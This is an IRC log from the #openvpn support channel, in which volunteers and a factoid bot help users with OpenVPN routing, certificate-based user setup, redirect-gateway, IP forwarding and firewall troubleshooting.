[~ntrrgc@79.109.52.159.dyn.user.ono.com] has quit [Quit: Konversation terminated!] 11:58 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:58 < rob0> iptables cannot fix broken routing, but it certainly can break working routes! 11:58 -!- AsadH is now known as zz_AsadH 12:06 -!- dzubey [~dzubey@68.14.254.195] has joined #openvpn 12:11 < eggy> I'm assuming so, but I don't know what the problem is. 12:11 < eggy> according to this: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 12:11 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 12:11 < eggy> It should be working :/ 12:12 < rob0> According to /topic, your problem is your firewall, really. 12:12 < rob0> !iptables 12:12 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just the 12:12 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 12:14 < TheWarden> okay, I've just exhausted all options that I can find or understand. 12:14 -!- brute11k [~brute@89.249.231.109] has joined #openvpn 12:15 -!- rooth_ [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Read error: Operation timed out] 12:15 -!- TheWarden_ [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 12:17 < TheWarden_> Do I achieve this with PAM or LDAP plugin or a script? or all three? If its all three which is the easyest? I can't find any instructions on specifics on the subject. I've read and read... please just point me into the right direction at least. 12:17 -!- TheWarden is now known as Guest88343 12:18 -!- Guest88343 [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Ping timeout: 245 seconds] 12:21 < eggy> figured it out, was a 'firewall' issue actually ;( 12:21 -!- TheWarden_ [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 12:26 -!- JSharpe [~JSharpe@5.63.146.148] has joined #openvpn 12:28 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has joined #openvpn 12:29 < jpalmer> hey guys. I have to use openvpn with tcp. but I'm having an issue where when the connection drops, the client doesn't realize it. so it doesn't tear it down and reconnect. I've seen a couple keepalive settings. but not sure which one I need to determien when the link is dead. 12:33 < jpalmer> I'm thinking of doing keepalive 30 120 but would like confirmation that it's going to do what I think. 12:37 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:13 <@ecrist> should work. 13:21 -!- eggy [uid554@gateway/web/irccloud.com/x-parhtlctkgnhjhaw] has left #openvpn [] 13:32 -!- joeblow750 [~Adium@host86-180-155-170.range86-180.btcentralplus.com] has joined #openvpn 13:34 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 13:37 -!- raidz is now known as raidz_away 13:42 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:47 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:53 < jpalmer> thanks ecrist 13:55 <@ecrist> np 13:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:00 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Remote host closed the connection] 14:00 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 14:05 -!- joeblow750 [~Adium@host86-180-155-170.range86-180.btcentralplus.com] has quit [Ping timeout: 252 seconds] 14:11 -!- kubbing_ [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Remote host closed the connection] 14:21 -!- staticsafe [staticsafe@unaffiliated/staticsafe] has joined #openvpn 14:30 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 14:30 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn 14:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:39 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 15:08 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 15:09 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Remote host closed the connection] 15:17 < jzaw> would it be wrong to have non rfc1918 ips on a LAN of a gw router (and dhcp handing them out to lan client) 15:17 -!- JSharpe_ [~JSharpe@5.63.146.148] has joined #openvpn 15:17 -!- JSharpe [~JSharpe@5.63.146.148] has quit [Read error: Connection reset by peer] 15:17 -!- fogus [~fogus@pool-108-21-49-67.nycmny.fios.verizon.net] has joined #openvpn 15:17 < jzaw> and then vpn to a no nat network to which to whose gw those ips are routed 15:17 < jzaw> and then go down the vpn 15:18 < pekster> jzaw: Nothing wrong at all with that, provided you own the IPs your allocating 15:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 15:18 < jzaw> but those non rfc1918 ips are behind nat 15:18 < fogus> Hello. I have openvpn installed and I need to add a new user. I looked through man openvpn... how can I see what version of openvpn I am running? 15:18 < jzaw> pekster, yes mine from my isp 15:18 < jzaw> ive got it going ... its working exactly how i wanted 15:18 < pekster> Sure, then they're yours to do as you see fit. Using public IPs has benefits as you've pointed out with avoiding the need for NAT 15:18 < jzaw> try ping fuji-pl.dzki.co.uk 15:19 < pekster> 100% loss 15:19 < jzaw> yeah? 15:19 < jzaw> hmm 15:19 < jzaw> good test 15:19 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 15:19 < jzaw> i needed to test from without 15:19 < jzaw> cos so far ive been within 15:19 < pekster> http://paste.kde.org/696626/ 15:20 < pekster> Oh, hang on, more hops showed up 15:20 < jzaw> thats going to be firewall ? 15:20 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 15:20 < pekster> http://paste.kde.org/696632/ 15:20 < jzaw> gosh that a lot of hops 15:20 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Remote host closed the connection] 15:20 < fogus> How can I add a user to this openvpn? The existing users do not have linux accounts on this machine. I don't know how they were created in the first place. I don't see a web UI. I can't find an openvpn command that allows mem to add a user. 15:21 < fogus> Some users do not even appear to have keys within /etc/openvpn/keys. 15:21 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 15:21 < jzaw> thats an interesting route pekster 15:21 < pekster> fogus: OpenVPN does not come with a web UI. If you're using the non-free commercial Access Server product, you want their channel, #openvpn-as 15:21 < jzaw> im begining to majorly dislike m0n0wall 15:21 < fogus> No, then I believe I am in the right channel, pekster. 15:21 < rob0> !howto 15:21 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 15:22 < pekster> fogus: Oh, "don't see", sorry mis-read that 15:22 < rob0> Generally an openvpn server will use TLS certificate authentication. 15:22 < rob0> fogus, who set this up for you? 15:22 < fogus> the previous admin. 15:23 < rob0> ah, well, let's hope he documented things for you. 15:23 < fogus> nope :) 15:23 < rob0> If you can't find where he ran his TLS CA, you'll have to start from scratch. 15:24 < pekster> Unless it's set up to use user-pass and no client certs, then you need to add the user to whatever backend auth system is being used 15:24 < pekster> (that would be outside of openvpn at that point) 15:24 < fogus> I'm looking for the steps that would be required to add a user in general. Then I will use `history` and `find` as with other problems I have faced I assume. 15:25 < pekster> See the howto for the certificate process 15:25 < fogus> it looks like he tried ldap at one point but may have given up 15:25 < pekster> If you're using --auth-user-pass-verify, the way to add users is not part of openvpn 15:25 < fogus> "Setting up your own Certificate Authority (CA) and generating certificates and keys for an OpenVPN server and multiple clients" ? 15:25 < rob0> well, "history" as root would not make sense. The CA should not even be on the server machine, really. 15:25 < fogus> Then it probably is. 15:25 < rob0> (and definitely not owned by root on any machine.) 15:26 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:26 < fogus> yep, it is. 15:27 < pekster> PKI files owned by root isn't strictly the problem, but it becomes one when you do all your PKI interaction by calling programs needlessly as root 15:27 < fogus> I see, ok. 15:27 < pekster> (since root can access any file anyway, it's not permissions but the implication of execution that's bad for security) 15:28 < fogus> Is /usr/share/doc/openvpn/examples/easy-rsa/2.0/build-key what I'm after then? 15:28 < fogus> `which build-key` returns nothing 15:29 < pekster> Probably, although you shouldn't be running your PKI out of the /usr/share/doc/ subdirectory. You should have made a copy somewhere else so your next distro software upgrade doesn't wipe out your local changes 15:29 < fogus> That sounds like something intelligent. 15:29 < rob0> Again, ideally: as a non-root user on a non-VPN machine. 15:30 < fogus> So, when my Mac-running user asks to get in the VPN, I have to send him a generated private key? 15:30 -!- raidz_away is now known as raidz 15:31 < fogus> I mean, is that one way of doing it? 15:31 < pekster> In short, yes. "Even better" security is to have a way to generate the keypair on the client device, have the client send a certificate signing request (CSR, sometimes called a .req file) to the CA, the CA signs it, and sends back the certificate. Many people use the Easy-RSA 2.x stuff to build the key on the system and send it to the client. It's easier, but less secure as someone else has the private key and password 15:32 < fogus> Gotcha, that's what the paragraph starting with "The answer is ostensibly yes. In the example above..." says? 15:32 < rob0> ^^ 15:34 < fogus> Ok. and the "./build-dh" command, that must have been already run and the output files in place for this server to be presently serving VPN users? 15:34 < pekster> That's a one-time operation, just like creating your CA keypair 15:34 < pekster> You can change DH params any time you want; only the server uses that, and it's not consisdered private information 15:35 < fogus> The server does not have a username associated with these client keys, does it? 15:36 < pekster> The server references the CN (the certificate's "Common Name") as the unique identity of the user 15:38 < fogus> Does the user have to put that CN in his client software? 15:39 < pekster> Nope, it's included in the certificate itself 15:42 < pekster> Here's a small sample from a test cert I generated in my testing: http://paste.kde.org/696716/ 15:42 < pekster> In that example, the cert CN is "client1" and the issuing CA is "Easy-RSA CA" 15:49 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 264 seconds] 15:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 258 seconds] 15:56 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 16:03 -!- dazo is now known as dazo_afk 16:03 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 16:03 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 16:09 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 16:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds] 16:16 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has left #openvpn [] 16:27 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 16:30 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 16:30 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Read error: Connection reset by peer] 16:31 -!- staticsafe [staticsafe@unaffiliated/staticsafe] has left #openvpn ["WeeChat 0.4.0"] 16:36 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 16:39 -!- JSharpe_ is now known as JSharpe 16:39 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 16:41 < jzaw> pekster, ive been looking at that traceroute 16:42 < jzaw> and its got me baffled .... surely if i can ping / browse / email down the vpn 16:42 < jzaw> from the client end 16:42 < Nemus> !ifconfig 16:42 <@vpnHelper> "ifconfig" is usage: ifconfig l rn | Set TUN/TAP adapter parameters. l is the IP address of the local VPN endpoint. For TUN devices, rn is the IP address of the remote VPN endpoint. For TAP devices, rn is the subnet mask of the virtual ethernet segment which is being created or connected to. 16:42 < jzaw> and i can ping from lan side of router and all lan clients on the server end 16:43 < jzaw> ive got my routes right? 16:46 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Read error: Connection reset by peer] 16:47 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 16:47 < pekster> jzaw: If you're not using redirect-gateway, the reply might be asymettrically routed as the client will respond to my public IP sending the ping out its native connection, not the VPN 16:47 < pekster> If it is, chances are a firewall has blocked it at some point along the path 16:49 < pekster> Note that the traceroute was done using ICMP echo-request packets, not the traditional UDP packets (since you asked for a ping, I figured I might as well just trace with pings too for you) 16:50 -!- p3rror [~mezgani@41.248.140.203] has joined #openvpn 16:51 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Read error: Connection reset by peer] 16:51 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 16:58 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Read error: Connection reset by peer] 16:59 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has joined #openvpn 17:01 -!- JSharpe [~JSharpe@5.63.146.148] has quit [Quit: Leaving] 17:07 -!- Camicio [~Camicio@177-162.195-178.cust.bluewin.ch] has quit [Ping timeout: 258 seconds] 17:10 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 17:16 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 17:19 -!- joeblow750 [~Adium@cpc13-haye17-2-0-cust143.haye.cable.virginmedia.com] has joined #openvpn 17:20 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 17:24 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 17:32 < jzaw> jzaw: If you're not using redirect-gateway, the reply might be asymettrically routed as the client will respond to my public IP sending the ping out its native connection, not the VPN 17:32 < jzaw> ahhhh that makes v good sense 17:33 < jzaw> my main problem from here is im remote to the home lan .... and these things need testing from without rather than within the network 17:33 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:33 < jzaw> if youve time can you do a trace using udp ? 17:33 < pekster> Get a remote shell somewhere. I'm not sure what tools the normal 'users' group gets, but SDF (at sdf.org, aka freeshell.org) has free shell accounts. Well, "free" although they do ask for a $1 donation to keep out spam 17:34 < pekster> Sure, I'm about to leave for the afternoon, but let me get you a UDP trace 17:35 < jzaw> i have seen them pekster i was wondering if they were *safe* 17:35 < jzaw> ie later inundate you with spam 17:36 < jzaw> but of course i can just use a throwaway alias on my email 17:36 < pekster> They're fine. They're also old as dirt 17:36 < pekster> No, the guy who runs it (smj, Stephen Johnson IIRC) is one of the good guys 17:36 < jzaw> :) 17:36 < pekster> And since they've been around forever, you can get a gopher page set up ;) 17:37 < pekster> It's worth donating at least the $1, and honestly, a one-time donation of $36 to become part of the 'ARPA' group is reall worth it too 17:37 < pekster> I did that several years ago, and best $36 one-time fee for shell access you'll find a lot of places 17:38 < pekster> http://paste.kde.org/696878/ 17:38 < jzaw> nice! 17:38 < pekster> Looks like your systems (the vpn. and further in) did reply to the ping, but they drop traceroute traffic 17:38 * pekster disappears 17:39 < jzaw> i did a one time donation years ago to dyndns as it was back then ... well i did 2x ... and ive got two permanent no cost real domains with them 17:39 < jzaw> useful for playing 17:40 < jzaw> can you tell whats dropping stuff at hop18? 17:40 < jzaw> ah hes gone ta for now 17:40 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:02 -!- joeblow750 [~Adium@cpc13-haye17-2-0-cust143.haye.cable.virginmedia.com] has quit [Quit: Leaving.] 18:08 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 18:14 -!- brute11k [~brute@89.249.231.109] has quit [Read error: Connection reset by peer] 18:17 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 18:29 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:39 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 18:40 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:40 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:41 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 18:41 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 18:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:48 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 19:00 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 264 seconds] 19:02 -!- p3rror [~mezgani@41.248.140.203] has quit [Ping timeout: 258 seconds] 19:35 -!- raidz is now known as raidz_away 19:38 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:41 -!- rickbol [~rickbol@173-132-103-55.pools.spcsdns.net] has joined #openvpn 19:49 -!- rickbol [~rickbol@173-132-103-55.pools.spcsdns.net] has quit [Read error: Connection reset by peer] 19:57 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 20:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 20:04 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 20:05 -!- rickbol [~rickbol@cpe-174-096-184-106.carolina.res.rr.com] has joined #openvpn 20:15 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 20:31 -!- MeanderingCode [~Meanderin@199.254.238.206] has joined #openvpn 20:35 < nutcase> my openvpn suddenly seems to have stopped working O.o 20:35 < nutcase> I can connect to the server and do anything internally on the server but its not routing trafic outside of its own little network 20:43 -!- fogus [~fogus@pool-108-21-49-67.nycmny.fios.verizon.net] has left #openvpn ["WHO #dordt-cs"] 20:53 -!- Devastator [~devas@186.214.110.30] has quit [Changing host] 20:53 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 21:04 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 21:04 < hrenovo> hi. new openvpn installation here on debian 6.0.7. So openvpn service starts and I can confirm that it is listening on netstat -anp | grep :1194 21:04 < hrenovo> but 21:05 < hrenovo> telnet localhost 1194 returns telnet: Unable to connect to remote host: Connection refused 21:05 < jpalmer> does it show *:1194 or 0.0.0.0:1194? 21:06 < jpalmer> paste the output of your "netstat -anp | grep :1194" 21:06 < hrenovo> jpalmer: thanks on it 21:07 < rob0> um, is that TCP or UDP? I thought udp was -u and tcp was -t 21:07 < hrenovo> http://fpaste.org/w4zK/ 21:07 < rob0> anyway, telnet(1) is TCP. You can test UDP with nc(1) 21:08 < hrenovo> jpalmer: different port 21:08 < hrenovo> jpalmer: forget 1194, its port 1337 21:08 < jpalmer> hrenovo: ok, so, you'd need to connect to that port. and as rob0 rightly pointed out, telnet won't work, since you are using udp 21:09 < jpalmer> which also means, if you have a firewall in place.. you need to open that port for udp traffic, not tcp traffic 21:09 < hrenovo> so its all fine ? 21:09 < hrenovo> http://fpaste.org/pJDW/ 21:10 < jpalmer> looks fine, from that. have you tried connecting a client? 21:10 < hrenovo> no not yet 21:10 < jpalmer> (but the interface being up, doesn't necessarily mean it's working as expected) 21:10 < hrenovo> ah I see 21:11 < hrenovo> I will isntall the client now 21:11 < hrenovo> or should I try from another linux box ? 21:12 < jpalmer> I'd do it from the.. client you want conencted to the vpn server 21:13 < hrenovo> i've used openvpn over 2 years ago so please forgive me 21:14 < hrenovo> openvpn server is a debian box 21:14 < hrenovo> client will be centos 21:14 < hrenovo> i hope its not a problem 21:20 < jpalmer> it's not. 21:27 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 21:27 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 21:31 < hrenovo> jpalmer: hmm. configured the client in centos 21:31 < hrenovo> jpalmer: fails to start 21:32 < hrenovo> I wonder if I can look up the log 21:32 < hrenovo> I know why 21:33 < hrenovo> yup, I can ping the server ) 21:34 < hrenovo> cools !!! 21:35 < hrenovo> I wonder if it will for from windows if I install cygwin 21:35 < hrenovo> if it will work* 21:39 < hrenovo> where is the server log ? 21:50 < pekster> OpenVPN has native Windows installers 21:50 < pekster> !download 21:50 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 21:50 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 22:01 < hrenovo> ok 22:01 < hrenovo> I am connected to openvpn server with windows vpn-gui 22:02 < hrenovo> but 22:02 < hrenovo> when I go to check my IP address in the web browser, it is not changed 22:02 < hrenovo> www.whatismyip.com 22:02 < hrenovo> I was under the impression that it should show the wan ip of openvpn server ... 22:03 < pekster> Connecting to a VPN is nothing but a connecetion between the client and server 22:03 <@EugeneKay> !redirect 22:03 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:03 <@vpnHelper> http://ircpimps.org/redirect.png 22:03 <@EugeneKay> hrenovo ^ 22:03 < pekster> EugeneKay: Bleh, I had a much more wordy preface to that :P 22:03 <@EugeneKay> The flowchart works well. 22:04 <@EugeneKay> pekster - neener neener neenern 22:04 < hrenovo> redirect.png is 404 in the web browser 22:04 <@EugeneKay> Worksforme 22:05 < hrenovo> maybe its cached for you 22:06 < pekster> Nope, shift-reload (bypasses cache) is fine 22:06 < pekster> I can mirror it if you'd like 22:06 < hrenovo> please 22:06 < pekster> fwiw, fresh download via wget on my headless box works too 22:07 < pekster> Mirror: http://pekster.sdf.org/misc/redirect.png 22:08 < hrenovo> hmm 22:08 < hrenovo> so much networking 22:08 < hrenovo> ouch 22:09 <@EugeneKay> Yup. 22:09 < hrenovo> how would I enable redirect gateway on windows client ? 22:09 <@EugeneKay> !def1 22:09 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 22:10 < hrenovo> so I am just editing the client.conf ? 22:10 < hrenovo> no matter linux or windows right ? 22:11 <@EugeneKay> Put what is listed in #3 in the server.conf 22:11 -!- athetius_ [~sollux@athetius.com] has left #openvpn [] 22:11 <@EugeneKay> Or, if you just want one client ot redirect, put the bit inside "" in your client.conf 22:12 < hrenovo> no, all clients is fine 22:12 < hrenovo> If I understand this right 22:14 < hrenovo> right now in server.conf I have this - ;push "redirect-gateway def1 bypass-dhcp" 22:15 < hrenovo> should I change that to push "redirect-gateway def1" 22:15 < hrenovo> ? 22:26 < hrenovo> I changed it 22:27 <@EugeneKay> Yeah, no need for bypass-dhcp 22:27 < hrenovo> now I can connect with a client, but now internet is not working on the client 22:27 < hrenovo> hehe 22:27 <@EugeneKay> Good. That means it's working 22:27 < hrenovo> really ? 22:27 <@EugeneKay> Yup. 22:27 < hrenovo> lol 22:27 <@EugeneKay> Now continue down the flowchart :-p 22:27 < hrenovo> but no internet 22:28 < hrenovo> ah ! ok 22:28 < hrenovo> very interesting ... 22:29 < hrenovo> yeah, ip forwarding not enabled I guess 22:29 < hrenovo> how would I enable ip forwardeing ? 22:30 <@EugeneKay> The bot knows all 22:30 <@EugeneKay> !ipforward 22:30 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 22:31 < hrenovo> damn 22:31 < hrenovo> I don't understand networking that well 22:31 < hrenovo> I am not even sure if the ip forwarding should be enabled on the client or the server 22:32 <@EugeneKay> !redirect 22:32 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:32 <@vpnHelper> http://ircpimps.org/redirect.png 22:32 <@EugeneKay> See #1 ;-) 22:32 < hrenovo> lol 22:33 < hrenovo> !linipforward 22:33 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 22:37 < hrenovo> ok i've done #1 22:37 < hrenovo> but not sure if I need to restart any service 22:39 < pekster> !basic 22:39 <@vpnHelper> "basic" is if you do not understand basic networking, you probably should not be administrating a vpn... you should understand the basics of routing / firewalls first 22:39 < pekster> !tcpip 22:39 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 22:42 < hrenovo> I am sure this is an interesting book 22:42 < hrenovo> but I am just an average user 22:42 < hrenovo> or should I say below average 22:42 < hrenovo> compared to you pekster 22:43 < hrenovo> i'd be glad to follow a guide on this if there was one available 22:43 < hrenovo> this way I won't have to bother irc channel 22:44 < pekster> flowchart + google (and any references the bot has) are a good start 22:44 < pekster> A VPN is a somewhat advanced form of networking, especially when you're playing with routing across it. Having poor networking skills is a severe hinderance when you're trying to do semi-advanced netwnorking 22:46 < hrenovo> I asked if there should be a service restarted after adding net.ipv4.ip_forward = 1 in sysctl.conf 22:46 < pekster> Values under /proc/sys/ (or controlled via sysctl) take effect right away. You should make the changes persistent in the way your OS exposes sysctl settings to you 22:46 <@EugeneKay> sysctl.conf is applied at boot. fiddling with /proc/sys/ applies immediately. 22:46 <@EugeneKay> (but is lost at boot) 22:51 < hrenovo> can't save ip_forward for some reason 22:52 < hrenovo> nvm got it 22:54 < hrenovo> still can't ping 8.8.8.8 from the client 22:55 -!- MeanderingCode [~Meanderin@199.254.238.206] has quit [Ping timeout: 264 seconds] 22:55 < hrenovo> is #1 enough for "linipforward" ? 22:55 <@EugeneKay> #3 too 22:59 < hrenovo> okay did #3 23:01 < hrenovo> can't see it in iptables -L 23:02 <@EugeneKay> It'll be in the nat table(-L -t nat) 23:02 <@EugeneKay> If you have anything in the filter table you'll need to make the appropriate hole so traffic from tun+ can get out eth+ 23:02 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has joined #openvpn 23:04 < hrenovo> EugeneKay: http://fpaste.org/Tmh9/ 23:04 < hrenovo> I am not even sure if its added or not 23:05 < hrenovo> from looking at the output 23:05 < stan_man_can> I'm trying to get my openvpn to work as a proxy. The openvpn server is running on an ubuntu vps, and my client machine is osx 23:06 < stan_man_can> I've added push "redirect-gateway def1" to my server.conf 23:06 <@EugeneKay> !redirect 23:06 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 23:06 <@vpnHelper> http://ircpimps.org/redirect.png 23:06 < hrenovo> lol same problem 23:06 <@EugeneKay> stan_man_can - follow the chart ^ 23:06 < stan_man_can> EugeneKay: I believe the problem is something to do with the DNS 23:06 <@EugeneKay> The chart+bot know all ;-) 23:06 < stan_man_can> when I add the push "dhcp-option DNS 10.8.0.1" my client continually reconnects 23:07 <@EugeneKay> !dns 23:07 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 23:07 < hrenovo> !ipforward 23:07 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 23:07 <@EugeneKay> !pushdns 23:07 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS 